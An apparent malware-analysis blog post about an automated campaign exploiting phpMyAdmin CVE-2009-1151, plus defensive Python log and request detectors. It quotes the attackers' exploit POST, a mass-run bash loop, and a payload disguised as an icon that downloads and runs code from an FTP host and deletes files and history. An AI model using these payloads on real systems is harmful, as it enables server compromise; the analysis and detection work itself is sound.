phpMyAdmin PMA vuln CVE-2009-1151
How CVE-2009-1151 is used in the wild

Today we (MalwareMustDie) found this campaign of automated exploitation of phpMyAdmin instances which are vulnerable to CVE-2009-1151. In short: it abuses an improperly escaped variable to inject code which is then included in config.inc.php; see this interesting blog post for additional information.

We found a pack of files that the morons used. They run a PHP script from the console to exploit remote systems; it sends a POST request with a fake user agent carrying the exploit code:

    send_data('POST',$pma_setup_url,'action=lay_navigation&eoltype=unix&token='.$token.'&configuration='.urlencode('a:1:{i:0;O:10:"PMA_Config":1:{s:6:"source";s:'.strlen($ftp_code).':"'.$ftp_code.'";}}'),$pma_setup_url,$cookie_array,'Opera');

$ftp_code is 'ftp://andre:[email protected]/fafico.ico', and fafico.ico contains the following:

    <? system("cd /tmp;rm -rf *;wget ftp://sysbackup1:[email protected]/c.pdf;perl c.pdf;curl -O
    ftp://sysbackup1:[email protected]/c.pdf;perl c.pdf;fetch
    ftp://sysbackup1:[email protected]/c.pdf;perl
    c.pdf;rm -rf c.pdf;history -c;");exit?>

This downloads further malware and executes it, disguised as a PDF in a very stupid way. The FTP account does not work anymore, so I could not obtain a sample. The whole kit is CTRL+C, CTRL+V work. The morons were even too stupid to run or edit the files properly; there are dozens of tiny .sh scripts which just run the PHP exploit script, for example:

    #!/bin/bash
    #php exploitx.php -a $1

    for i in `cat v`
    do
    echo Il furam pe nenea de access $i
    #php exploitx.php -a $i
    command='php exploitx.php -a '$i'';
    # run $command in background, sleep for our timeout then kill the process if it is running
    echo $command
    $command &
    pid=$!
    echo "sleep 10; kill $pid" |
    wait $pid &> /dev/null
    if [ $? -eq 143 ]; then
    echo "Trecem la urmatorul 10 secs reached."
    echo
    fi

    done
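The POST request and the serialized PMA_Config payload shown above are what a defender can look for. The following is an added example (not code from the post or from the exploit kit) that classifies captured setup.php POST bodies: it parses the `configuration` parameter, looks for an injected PMA_Config object, verifies the declared PHP string length rather than trusting a greedy match, and extracts the remote `source` URL as an indicator. It assumes request bodies are available from a WAF or reverse proxy; the sample bodies and the TEST-NET host are constructed.

```python
"""Flag CVE-2009-1151 exploitation attempts in captured setup.php POST bodies.

Added example, not code from the MalwareMustDie post. It assumes request
bodies are available (e.g. from a WAF or reverse-proxy log); the sample
bodies below are constructed and use a placeholder TEST-NET host.
"""
import re
from urllib.parse import parse_qs, urlencode, urlparse

# Serialized-object marker and the `source` property the exploit sets.
PMA_CONFIG_MARKER = b'O:10:"PMA_Config":'
SOURCE_RE = re.compile(rb's:6:"source";s:(\d+):"')

# Schemes that make PHP fetch a remote file instead of the local config.
REMOTE_SCHEMES = {"ftp", "ftps", "http", "https"}


def extract_source(serialized: str):
    """Return the `source` string of a serialized PMA_Config object, or None.

    PHP serialize() string lengths are byte counts, so the parsing is done on
    bytes and the declared length is checked against the closing quote.
    """
    data = serialized.encode("utf-8")
    idx = data.find(PMA_CONFIG_MARKER)
    if idx < 0:
        return None
    m = SOURCE_RE.search(data, idx)
    if m is None:
        return None
    length = int(m.group(1))
    start = m.end()
    if data[start + length:start + length + 2] != b'";':
        return None  # declared length does not line up: malformed, ignore
    return data[start:start + length].decode("utf-8", "replace")


def classify_request(body: str) -> dict:
    """Classify one application/x-www-form-urlencoded POST body."""
    params = parse_qs(body, keep_blank_values=True)
    configuration = params.get("configuration", [None])[0]
    verdict = {"malicious": False, "reason": "", "ioc": None, "host": None}
    if configuration is None:
        verdict["reason"] = "no configuration parameter"
        return verdict
    source = extract_source(configuration)
    if source is None:
        verdict["reason"] = "configuration holds no PMA_Config object"
        return verdict
    # A legitimate setup save sends a plain serialized array, never an object,
    # so any PMA_Config object is an injection attempt; a remote source is the
    # variant seen in this campaign and gives us a host to block.
    parsed = urlparse(source)
    verdict.update(malicious=True, ioc=source, host=parsed.hostname)
    if parsed.scheme.lower() in REMOTE_SCHEMES:
        verdict["reason"] = f"PMA_Config source points to a remote file ({parsed.scheme}://)"
    else:
        verdict["reason"] = "serialized PMA_Config object injected into configuration"
    return verdict


def build_body(configuration: str) -> str:
    """Constructed sample body in the shape of the attacker's POST."""
    return urlencode({
        "action": "lay_navigation",
        "eoltype": "unix",
        "token": "0123456789abcdef",  # placeholder setup token
        "configuration": configuration,
    })


# Placeholder remote file (constructed); the campaign used an FTP URL with credentials.
ATTACKER_SOURCE = "ftp://user:pass@203.0.113.10/fafico.ico"
MALICIOUS_BODY = build_body(
    'a:1:{i:0;O:10:"PMA_Config":1:{s:6:"source";s:%d:"%s";}}'
    % (len(ATTACKER_SOURCE.encode()), ATTACKER_SOURCE)
)
# A harmless setup save: a serialized array with no object inside.
BENIGN_BODY = build_body('a:1:{s:7:"Servers";a:0:{}}')

if __name__ == "__main__":
    for label, body in (("malicious", MALICIOUS_BODY), ("benign", BENIGN_BODY)):
        print(label, classify_request(body))
```

Feed it the bodies your proxy or WAF captured for POSTs to the setup script; the `host` field of a positive verdict is the FTP/HTTP server to add to your blocklist and to search for in outbound connection logs.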

We also found lists of vulnerable phpMyAdmin installs there. Why are they still vulnerable to this old CVE? Because admins are not upgrading their systems. With the latest phpMyAdmin version this no longer works, so why not update? The IP lists contain thousands of servers; they simply scanned whole IP ranges. vuln.txt, as an example, contains 306615 vulnerable phpMyAdmin installs! Well, many are not reachable, but the problem remains: many outdated phpMyAdmin installs are available.

They also download an ELF malware sample which is fairly old and well known, though not detected by ClamAV, for example.

Also included are public PHP classes which are misused to run their evil crap, for example OS_Guess for guessing the OS and getting details about it.

Following is a list of the IPs which host their bad scripts via FTP:

Here you can find some gathered information and additional information about this.

Inside is also the ELF zmeu, VT link. Hashes:

It’s a known vulnerability scanner for phpMyAdmin.

Also interesting is a string I found in the file rand, which is used to scan the IP ranges:

    # zmeu blackhat anti-sec

So we have a name?
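The scanner described above works by probing candidate phpMyAdmin directories for the setup script, and the conclusion below recommends renaming the default directory for that reason. As an added example (not code from the post or from the scanner kit), here is a small access-log analysis that flags source IPs probing several different directories for `scripts/setup.php`, lists the directories where the setup script actually answered 200, and records POSTs to it, which is the exploit step. It assumes the Apache/nginx "combined" log format and the `scripts/setup.php` location of the affected 2.11.x releases; the log lines below are constructed and use TEST-NET addresses.

```python
"""Spot automated probing of phpMyAdmin setup scripts in web access logs.

Added example, not code from the post or from the scanner it describes.
Assumes the "combined" log format and treats any request for
<dir>/scripts/setup.php as a probe for the setup script abused by
CVE-2009-1151. The sample log lines are constructed (TEST-NET addresses).
"""
import re
from collections import defaultdict

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"'
)
# Directory prefix (empty for a root install) in front of scripts/setup.php.
SETUP_RE = re.compile(r'^(?P<dir>(?:/[^/?]+)*)/scripts/setup\.php', re.IGNORECASE)


def analyse(lines, threshold=3):
    """Summarise setup.php probes.

    scanners: IPs that probed at least `threshold` distinct directories
    reachable_setup: directories where setup.php answered 200 (fix these first)
    setup_posts: (ip, directory, user agent) of POSTs to setup.php
    """
    probes = defaultdict(set)
    reachable = set()
    setup_posts = []
    for line in lines:
        m = LOG_RE.match(line)
        if m is None:
            continue  # not a combined-format line
        s = SETUP_RE.match(m["path"])
        if s is None:
            continue  # not a setup.php request
        directory = s["dir"] or "/"
        probes[m["ip"]].add(directory)
        if m["status"] == "200":
            reachable.add(directory)
        if m["method"] == "POST":
            setup_posts.append((m["ip"], directory, m["ua"]))
    scanners = {ip: sorted(d) for ip, d in probes.items() if len(d) >= threshold}
    return {
        "scanners": scanners,
        "reachable_setup": sorted(reachable),
        "setup_posts": setup_posts,
    }


# Constructed sample: one scanner guessing directory names until it hits
# /myadmin and then POSTing to it, plus an unrelated client with a single miss.
SAMPLE_LOG = """\
203.0.113.7 - - [18/Jan/2015:10:00:01 +0000] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 404 210 "-" "Opera"
203.0.113.7 - - [18/Jan/2015:10:00:01 +0000] "GET /pma/scripts/setup.php HTTP/1.1" 404 210 "-" "Opera"
203.0.113.7 - - [18/Jan/2015:10:00:02 +0000] "GET /myadmin/scripts/setup.php HTTP/1.1" 200 5120 "-" "Opera"
203.0.113.7 - - [18/Jan/2015:10:00:03 +0000] "POST /myadmin/scripts/setup.php HTTP/1.1" 200 312 "-" "Opera"
198.51.100.4 - - [18/Jan/2015:10:05:00 +0000] "GET /index.php HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
198.51.100.4 - - [18/Jan/2015:10:05:02 +0000] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 404 210 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for key, value in analyse(SAMPLE_LOG.splitlines()).items():
        print(key, value)
```

Run it over your real access log with `analyse(open("access.log").readlines())`. An entry in `reachable_setup` means the setup script is still exposed on that path and the install needs upgrading (or the setup directory removing) regardless of whether anyone has scanned for it yet.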

Conclusion

Administrators, take care of your systems and upgrade them in time. Outdated versions are always riskier to use than current ones. Please always keep that in mind. And don't use simple passwords: 123456 is not a password, that is just digits! Also important: change the default directory name of your phpMyAdmin install; this will prevent it from being found by their automated scanners.

MalwareMustDie! Also mentioning our brilliant ELF team: great work, awesome interaction and sharp chopsticks! We add the spice to your rice!

*****
Written by wirehack7 on 18 January 2015